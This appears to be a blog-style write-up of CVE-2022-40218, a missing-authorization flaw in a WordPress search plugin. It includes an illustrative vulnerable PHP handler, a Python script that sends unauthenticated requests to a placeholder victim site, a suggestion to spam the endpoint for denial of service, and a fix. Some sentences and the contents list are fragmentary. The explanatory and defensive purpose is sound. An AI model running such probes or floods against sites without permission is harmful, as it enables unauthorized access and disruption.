CVE-2022-40218 - Exploiting Missing Authorization in ThemeHunk Advance WordPress Search Plugin (up to 1.1.4)

WordPress is the backbone for millions of websites, and plugins make it powerful but sometimes dangerous. In 2022, a serious issue called CVE-2022-40218 was found in the ThemeHunk Advance WordPress Search Plugin. This plugin helps website visitors search content in advanced ways, but until version 1.1.4, it didn't make sure only authorized users could perform certain actions.

In this long read, we’ll break down what was wrong, how it can be exploited, code snippets for experimenting, and give you links to original sources. Whether you are a site owner, researcher, or developer, by the end you’ll understand why missing authorization is a silent but deadly threat.

[What is CVE-2022-40218?](#what-is-cve-2022-40218)

2. [How Does the Advance WordPress Search Plugin Work?](#how-does-the-advance-wordpress-search-plugin-work)

[References & Links](#references)

## What is CVE-2022-40218?

CVE-2022-40218 marks a vulnerability found in the "Advance WordPress Search" plugin by ThemeHunk, versions up to and including 1.1.4.

Versions Affected: Up to 1.1.4

- Impact: Any unauthenticated user could perform restricted actions which should be accessible to admins or logged-in users only.

Short explanation: The plugin forgot to check if a user is logged in or has the right permissions before enabling certain functions through its AJAX API.


## How Does the Advance WordPress Search Plugin Work?

Advance WordPress Search gives you a much better search box for your site. It connects JavaScript-powered search boxes to WordPress AJAX actions—special URLs where users can click, and the browser grabs results from the server.

Like many plugins, it uses WordPress's admin-ajax.php system for its background tasks, letting users search without reloading the page.

Why is this risky?

If the plugin fails to check *who* is making the request, *any* person—even random attackers—could hit those same backend functionalities.


## What Went Wrong – The Missing Authorization

Sometimes check if the AJAX request comes with a valid nonce (security token).

But, in Advance WordPress Search up to 1.1.4, the plugin exposes some AJAX actions to unauthenticated users without these checks. That means *anyone on the internet* can call these actions directly and perform tasks which should be locked down.

Example of a missing authorization check

// The plugin registers this for AJAX (example)
add_action( 'wp_ajax_nopriv_th_search',            'th_search_callback' );
add_action( 'wp_ajax_th_search',                   'th_search_callback' );

// The handler NEVER checks if the user is allowed to do this!
function th_search_callback() {
    // ...process search...
    // NO is_user_logged_in() or current_user_can() or nonce check
}

For the full plugin source, visit the plugin page.


## Building an Exploit: Simple Request, Big Problems

Let’s say you’re an attacker. You don’t need to be logged in. All you do is send a POST or GET request to:

https://victimsite.com/wp-admin/admin-ajax.php?action=th_search&your_search_params_here

Spam the action to overload resources (possible DoS)

## Code Snippet: Testing the Vulnerability

Here’s a sample Python script to try the vulnerable action on a WordPress site running the vulnerable plugin:

import requests

# The URL of the target site
target_site = 'https://victimsite.com';

# Example search term (could be anything)
search_term = 'test'

# Build the AJAX URL
ajax_url = f'{target_site}/wp-admin/admin-ajax.php'

# Build parameters (depends on how plugin expects data)
params = {
    'action': 'th_search',
    'search': search_term
}

# Send the request as an unauthenticated user
response = requests.post(ajax_url, data=params)

print('Status code:', response.status_code)
print('Response body:', response.text)

Replace 'https://victimsite.com'; with a real site (that you own or have permission to test on).

This script will trigger the search endpoint without being logged in, and the plugin will process the request.

Note: Don’t attack websites you don’t own. Always get permission.

How to Fix?

If you are a developer:

Add a nonce check and/or confirm permissions, e.g.

function th_search_callback() {
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'You must be logged in' ) );
        return;
    }

    // Or use a nonce to verify AJAX intent
    // check_ajax_referer('your-nonce-name-here');

    // Safe to proceed
}

If you are a site owner:

Disable or remove the plugin if no fix is available.

## References & Links

- Official CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40218
- WPScan entry: https://wpscan.com/vulnerability/5317eeb-1e93-4645-956b-031256bdf12
- ThemeHunk Advance Search WordPress Plugin
- Wordfence Blog: What is Missing Authorization?
- Original disclosure (if available)

Closing Thoughts

Vulnerabilities like CVE-2022-40218 show how skipping simple security checks can lead to dangerous exposures. If you write or run code for WordPress, always test for weak points, update often, and think about what an unauthorized visitor can do.

Stay safe, keep your plugins updated, and when in doubt—consult security professionals!

Timeline

Published on: 05/08/2024 12:15:07 UTC
Last modified on: 06/04/2024 17:15:37 UTC